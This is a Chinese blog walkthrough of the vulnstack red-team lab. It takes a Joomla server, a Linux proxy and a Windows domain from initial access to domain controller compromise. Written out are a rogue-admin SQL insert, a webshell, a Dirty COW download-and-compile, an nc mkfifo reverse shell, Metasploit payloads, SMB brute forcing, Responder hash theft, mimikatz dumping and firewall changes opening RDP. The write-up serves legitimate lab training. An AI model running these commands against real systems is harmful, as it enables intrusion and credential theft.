渗透靶场--vulnstack-红队评估实战(3)

最新推荐文章于 2024-05-03 14:06:03 发布
最新推荐文章于 2024-05-03 14:06:03 发布
阅读量1k 收藏 2
点赞数
分类专栏: 渗透靶场 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45794666/article/details/118930601
版权

vulnstack-红队评估实战(3)

环境配置

攻击者:
kali
192.168.154.129

web
192.168.154.135  192.168.93.100

pc  192.168.93.30

win2008  192.168.93.20

win2012  192.168.93.10

web1-ubantu  192.168.93.120

1.外网主机信息搜集

nmap扫描

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vGg14jbu-1626750775920)(C:\Users\J\AppData\Roaming\Typora\typora-user-images\image-20210716155058076.png)]

访问80发现joomla cms系统

安装使用joomscan进行扫描

git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl

image-20210716160033478

发现了配置文件访问得到账户信息
	public $host = 'localhost';
	public $user = 'testuser';
	public $password = 'cvcvgjASD!@';
	public $db = 'joomla';
	public $dbprefix = 'am2zu_';
访问刚刚扫描得到的后台地址尝试登录,不是那就再去连接数据库(因为3306开着)

连接成功直接查看用户信息

image-20210716162209288

administrator
$2y$10$N/Yv/9rzxyq.z0gLTT5og.pj3FFAP8Sq2PcBgsMX/Qnc2671qQkHy

尝试登录失败,应该是加密过的,所以尝试插入新的用户(因为权限足够)

插入新用户

这里有两种方法

1.自己建个joomla然后新建用户把加密后的密码复制过来插入

2.根据官方文档加密直接插入

这里选择第二种方便一点

INSERT INTO `am2zu_users`
   (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('Administrator2', 'admin2',
    'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`)
VALUES (LAST_INSERT_ID(),'8');

2.获取shell

登录后台,通过模板注入

创建新文件,然后写入木马

image-20210716163933986

通过模板url访问连接

http://192.168.154.135/templates/beez3/1.php

image-20210716164025759

通过基础信息可以看到服务器为ubuntu,并限制了很多代码命令执行函数

但是这里的服务器ip为192.168.93.120 而远端ip为192.168.93.100可以想到web服务器为一台反向代理服务器,web1为真正的web服务器

image-20210716184448373

哥斯拉可以利用payload绕过disable_function 执行命令

image-20210716164553708

搜索txt文件发现可能有用的东西

image-20210716164956790

web.config.txt是个备份文件 test.txt里面有账户信息

image-20210716165156820

直接ssh尝试连接

成功连接

image-20210716165410829

查看网段信息

image-20210716165513575

3.linux权限提升

利用linux-exploit-suggester.sh查看可利用漏洞
centos提权

可能性最大为脏牛,这里用脏牛2

image-20210716194146385

下载后利用成功提权

wget https://www.exploit-db.com/download/40839
cp 40839 exp.c
gcc -pthread exp.c -o dirty -lcrypt

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Wk5GQGTd-1626750775942)(C:\Users\J\AppData\Roaming\Typora\typora-user-images\image-20210716195447702.png)]

ubuntu提权

1.第一步是先将绕过disable_function的shell反弹到centos上(因为不能出网)

centos 安装nc
nc -l 2333
ubuntu
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.93.100 2333 >/tmp/f

image-20210717101319947

2.尝试前三个失败,网上找个新的2021-3493下载编译执行成功提权

image-20210717101732724

将rootshell反弹到msf上
use exploit/multi/script/web_delivery
set target 7    
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.154.129
set lport 4444
run

目标机执行生成的脚本语句

4.内网信息搜集

msf加载路由,挂代理给kali
run autoroute -s 192.168.93.0/24
run post/multi/manage/autoroute 


msf
use auxiliary/server/socks_proxy
set srvport 7777 
set version 5

image-20210716200534147

先使用msf

use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.93.0-255
set threads 5
run

image-20210716201546998

至此五台目标全部出现

外网
	192.168.154.135
	192.168.93.100
内网
	192.168.93.120


192.168.93.10 2012 
	53,123,137
192.168.93.20  2008
	137,1433 MSSQL
192.168.93.30   PC
	137

再使用nmap代理扫描

proxychains nmap -Pn -sT -sV 192.168.93.10 192.168.93.20 192.168.93.30 -F

5.横向移动

由于三台都是windows且开启了445端口,那么尝试拿到一台权限后smb横向

方式访问93.20的80端口是一个错误页面

尝试smb爆破

msf爆破

use auxiliary/scanner/smb/smb_login
set rhosts 192.168.93.20
set SMBUser administrator
set PASS_FILE /app/tools/dic/pass.txt
run

hydra爆破

proxychains4\ hydra -l administrator -P /app/tools/dic/pass.txt smb://192.168.93.20 -vV
伪造smb服务器盗取密码

利用192.168.93.20 开放的mssql尝试登录

search mssql
use 18
set username testuser
set password cvcvgjASD!@
set rhosts192.168.93.20
run

image-20210717104810840

先在centos上伪造一个smb服务器

git clone https://github.com/SpiderLabs/Responder.git
makedir re
upload Responder-master -r ./re
shell 
cd re
python Responder.py -I eth1 -wrf

利用mssql来进行泄露密码

攻击者伪造的smb服务器通过向共享目录投递连接外部服务器的资源文件,用户请求过程中尝试身份验证,会默认使用SMB协议将用户哈希发送到服务器,这样攻击者就会获取对方用户账户哈希。

use auxiliary/admin/mssql/mssql_ntlm_stealer
set password cvcvgjASD!@
set rhosts 192.168.93.20
set smbproxy 192.168.93.100
set username testuser
run

伪造服务器收到密码

image-20210717105429687

123qwe!ASD
smb连接得到shell

用到了

https://github.com/SecureAuthCorp/impacket
里面的wmiexec.py 拉到外面再执行,还要pip安装pycryptodomex和pyasn1包

执行得到shell

image-20210717120704332

开放3306端口放行防火墙后远程连接

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

image-20210717134616510

利用远程连接上传mimkatz工具,跑出administrator密码为 zxcASDqw123!!,

Nslookup -type=SRV _ldap._tcp

nslookup可知域控为 win-8ga56tnv3mv.test.org,ip为192.168.93.10

这里还可以利用msf生成会话然后跑密码

#因为目标机在内网所以使用bind_tcp
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.93.30
set smbuser administrator
set smbpass 123qwe!ASD

密码

load mimikatz
kiwi_cmd -f privilege::debug
kiwi_cmd -f sekurlsa::logonPasswords

然后再连域控开端口放行防火墙

run post/windows/manage/enable_rdp 
proxychains rdesktop 192.168.93.20
再利用smb继续命令执行开门,然后远程连接获取shell

image-20210717140210379

拿下域控!

image-20210717160029974

后续还有一台30的ip未开启SMB校验

假如其他机器未开启SMB签名校验,就能用来打该机器。倘若遇上相同密码或者是有权限操作目标机器的情况,就能直接返回目标机器的Shell

扫描是否开启签名
proxychains nmap -Pn -sT -p445 --open --script smb-security-mode.nse 192.168.93.10,20,30

利用centos的smb中继直接获得shell,密码其实和20一样

#中继
python Responder.py -I eth1 

#中继转发(位于tools目录下)
python MultiRelay.py -t 192.168.93.30 -u ALL

6ri9ht
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ATT&CK实战系列-红队实战(三) VulnStack靶场
weixin_68652890的博客
05-11 587
信息搜集 nmap 扫192.168.5.0/24网段 目标主机开启22 80 3306 思路:22 ssh爆破 远程连接 80 从网站getshell 3306 mysql 外联(数据库配置文件) 先访问80 指纹识别 joomla cms msf探测版本为3.9.12 没找到exp 用dirsearch 扫到后台 和数据库配置文件configuration.php~ 泄露数据库账号和密码 用Navicat连接数据库 [外链图片转存失败,源站可能有防盗链机制,建议
ATT&CK实战系列-红队评估(三)WP
h1nt的博客
08-18 541
环境搭建 靶机下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/5/ 将虚拟机下载下来后按照官方说明配置好网络环境即可开始测试 渗透流程 0x01 WEB信息收集 查看靶机WEB服务,发现是Joomla CMS搭建的demo站点 扫描目录得到配置文件的备份configuration.php~ 在其中翻到后端数据库的用户名和密码 同时端口扫描发现数据库服务可以外联 尝试用得到的账户密码登录,连接成功 0x02 添加管理员账
2024年网安最全Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
最新发布
2401_84252281的博客
05-03 1160
是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场渗透过程。
【红日靶场系列】ATT&CK红队评估3
weixin_45632448的博客
09-14 1265
IPC(Internet Process Connection)是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。连接成功,这里虽然找到了管理员的账号密码,但是密码是被加密的,而加密方式也并不知道(其实一般的网站后台账号的加密方式是MD5,这种的就可以直接将“123456”进行加密把他的替换掉,就可以登陆了,前提是要备份一下他原先的密码;但是这种就不能使用这种方式了)
ATT&CK实战系列-红队评估(三)
weixin_51801534的博客
12-29 3555
注:遇到问题不要急,上网搜一搜,多试几个搜索引擎 外网信息收集 我们首先对已知的IP(192.168.1.110)进行端口扫描: ┌──(root????kali)-[~/桌面] └─# nmap -T4 -sC -sV 192.168.1.110 如上图所示,发现Centos上面开放了22、80、和3306端口,分别运行着OpenSSH、nginx和MySQL, 访问80端口,发现是一个Joomla CMS搭建的站点 Joomla是一套全球知名的内容管理系统,是使用PHP语言加上MySQL数据库所开
vulstack红队评估(三)
PANDA墨森的博客
06-21 1023
原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13118679.html 一、环境搭建: ①根据作者公开的靶机信息整理 没有虚拟机密码,纯黑盒测试...一共是5台机器,目标是拿下域控获取flag文件 ②虚拟机网卡设置 centos双网卡模拟内外网: 外网:192.168.1.110 内网:192.168.93.100 其他主机都是内网,仅主机模式: 内网:192.168.93.0/24 所有虚拟机默认挂起状态,开启就已经登陆了...
红队渗透打点工具-FindUpload
03-07
在网络安全领域,红队渗透测试是模拟黑客攻击行为,以评估组织防御能力的一种重要方法。FindUpload作为一款红队打点工具,其核心功能在于帮助渗透测试专家有效地查找和定位网络系统中的文件上传点与登录框,从而加速...
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
05-27
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
【CTF-Crypto实战-2023红队】Babystack
07-28
Babystack
linux-红队基础设施自动化部署工具
08-13
红队基础设施自动化部署工具
php中常用的几种加密方式以及md5加密漏洞以及解决方案
stand_forever的博客
12-14 9935
一、md5(php中的最常用的加密方式) 在用md5进行加密时,至少要将md5加密两次以上(包含两次),或者再加上盐进行加密 二、password_hash(php5.5以上版本才可以使用) 官方说明链接:http://www.php.net/manual/zh/function.password-hash.php 1. 用户注册时提交过来密码,我们对用户密码进行加密,这里选择passwor...
微盾PHP脚本加密专家php解密算法
12-17
复制代码 代码如下: <?php /*********************************** *威盾PHP加密专家解密算法 By:Neeao *http://Neeao.com *2009-09-10 ***********************************/ $filename=”play-js.php”;//要解密的文件 $lines = file($filename);//0,1,2行 //第一次base64解密 $content=””; if(preg_match(“/O0O0000O0\(‘.*’\)/”,$lines[1],$y)) { $content
PHP hash加密与解密
陌潇
09-26 2463
几年前用的 md5 和加盐的加密方式都比较容易破解。今天做用户登录注册的时候遇到了hash加密的问题,顺便记录一下。 第一、加密 用到 password_hash() 函数:简单使用 //PASSWORD_DEFAULT 加密算法,目前是60位字符,官网说php的更新可能会变化的更长,多以存储的时候最好255 //123456 为需要加密的字符串 password_hash('123456',PASSWORD_DEFAULT); 第二、解密 加密倒是挺简单的,想要取出来用的时候发现没有解密的方法,找了.
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权
weixin_50815573的博客
03-03 4530
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权 搭建测试靶机 下载地址:DC: 3.2 ~ VulnHub 则靶机DC-3 ip:192.168.1.106(NAT连接) 攻击机kali linux ip:192.168.1.237 信息收集 使用:nmap -sP 192.168.0.0/24 进行扫描找到目标靶机 对目标靶机进行端口扫描 利用nmap对目标主机进行端口扫描,发现开放端口:80 使用命令:nmap -A -p- -T4 192.168.1.106
加密解密
weixin_39650971的博客
01-18 2948
一、MD5加密 /**      * 获取MD5加密后的字符串      * @param str 明文      * @return 加密后的字符串      * @throws Exception       */     public static String getMD5(String str) throws Exception {         /** 创建MD5加密对象 */  ...
TCP Ports list (3498 ports in list)
热门推荐
zyb378747350的专栏
01-11 40万+
参考地址:https://www.gasmi.net/tcp.php TCP Ports list (3498 ports in list) 1 tcpmux TCP Port Service Multiplexer 2 compressnet Management Utility 3 compressnet Compression Process
一次旁站信息泄露的dedecms站点渗透
zhangge3663的博客
11-26 888
今天又是准备划水认真工作的一天,没想到一到公司领导就甩了个站过来,这可能就是打工人吧 话不多说来看看站,先信息收集一波 初步测试目标站点 打开进去是一个类似购物商城的地方,没有什么特殊的点,想要操作基本都要进行登录,中间件是nginx 再看看插件,惊喜来了,是dedecms 先直接盲打一波后台地址/dede 直接404...... 再看看好歹有前台,先注册个用户 再查看最后更新时间 可以知道是dedecms v5.7 sp2的版本 这个版本之后有前台管理员密码重置漏洞和任意密码重
signature=07d3e2275808e4f2b67e8d3d2aca6858,8-K
weixin_26900991的博客
05-29 6万+
0001193125-20-040654.txt : 202002180001193125-20-040654.hdr.sgml : 2020021820200218171710ACCESSION NUMBER:0001193125-20-040654CONFORMED SUBMISSION TYPE:8-KPUBLIC DOCUMENT COUNT:16CONFORMED PERIOD OF R...
【精选】ATK&CK红队评估实战靶场三(超详细思路过程)
人若无名,便可专心练剑
12-18 121
我们可以发现,我们开始是打算渗透进入centos靶机,但是我们这里远程命令执行的命令,回显出来的信息都是ubantu的靶机的上网查了资料才知道,原来是Centos是Ubuntu的反向代理,用的是Nginx协议最后在/tmp/mysql目录下找到了一个账号和密码我们前面扫描centos靶机开放了22端口,我们这里可以尝试下ssh远程连接。
ATT\\\\&CK红队评估实战靶场
08-16
ATT&CK红队评估实战靶场四是一个实战训练场景,其中使用了phpmyadmin来利用数据库日志写入马来获取会话。具体的方法和之前的红日靶场一类似,你可以去查看相关链接了解更多细节。在攻击机要访问52网段的资源时,可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值